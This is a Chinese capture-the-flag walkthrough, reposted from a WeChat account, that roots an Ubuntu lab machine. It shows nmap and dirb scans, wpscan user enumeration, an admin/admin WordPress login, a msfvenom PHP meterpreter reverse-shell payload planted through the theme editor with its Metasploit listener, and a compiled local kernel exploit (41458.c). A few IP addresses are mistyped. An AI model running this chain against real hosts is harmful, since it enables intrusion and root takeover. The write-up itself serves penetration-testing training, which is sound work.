欢迎回来,我的新手黑客
今天给大家带来的是关于CTF方面的简单的内核提权,这是一个关于系统级的漏洞,如果可以发现这种漏洞,将有助于我们更快的进行主机渗透,所以我还是选择用文字的方式将其记录下来,在撰写该文章的时候,自己也复习了一遍
环境搭建:下载对应的镜像,使Kali和靶机处于同一个网段,即可以ping通
镜像下载地址:
https://pan.baidu.com/s/1eb3jFN8nHoq6MElBGRy9CQ
提取码:qhp8
Step1:每当遇到一个新的实验环境,第一步进行的几乎都是内网扫描,探测存活主机以及主机运行的服务
nmap -Pn -T4 192.168.83.0/24
根据输出信息找到我们的目标主机,该主机IP地址为192.168.83.136,开放的端口有21,22,80
接下来我们针对该主机进行更为细致的探测
nmap -sV 192.168.83.136
从输出中我们能更为细致的知道每个服务的详细信息,FTP服务可能存在后门我们可以用之前讲到过的工具进行探测,SSH服务可能存在私钥泄露,今天我们主要针对http服务进行探测
Step2:针对http服务进行探测,我们先用浏览器打开网页,通过F12看看能不能发现什么
从源代码上看,就是一张GIF图片,并没有什么发现,这个时候尝试对网站后台进行扫描
dirb http://192.168.83.136/
在扫描过程中我们发现一个有意思的输出信息,竟然还有一个站点,我们可以确定是一个wordpress的站点,先打开看看
还是没有什么突破,但是我们知道了这个站点是通过wordpress建站的,这个我们想到了一个工具,看看能不能找到可以直接利用的漏洞
wpscan --url http://192.68.83.136/wordpress --enumerate at --enumerate ap --enumerate u
其中的--enumerate代表枚举,at代表可用的主题,ap代表可用的插件,u代表用户名
我们看到枚举出了两个用户,那这个时候我们猜想会不会用户使用弱口令进行登录呢?我们尝试一下以账号密码都为admin登录
从之前对网站的扫描结果中找到URL,尝试登陆
很幸运,我们使用弱口令登陆管理后台,这个时候我们就想起了前一篇文章里面的wordpress站点拿shell
Step3:接下来我们先拿下服务器的权限,使用上一篇SMB服务信息泄露渗透主机讲过拿webshell方法
msfvenom -p php/meterpreter/reverse_tcp LHOST=192168.43.134 LPORT=4444 -f raw
点击左侧的Appearance->Editor
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.83.134
set LPORT 4444
exploit
gcc 41458.c -o root
chmod 777 root
shell
./root
如果你喜欢我写的文章,点一下右下角的“在看”,谢谢你啦
原文始发于微信公众号(Kali渗透测试教程):CTF入门之ubuntu内核提权拿下root权限
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论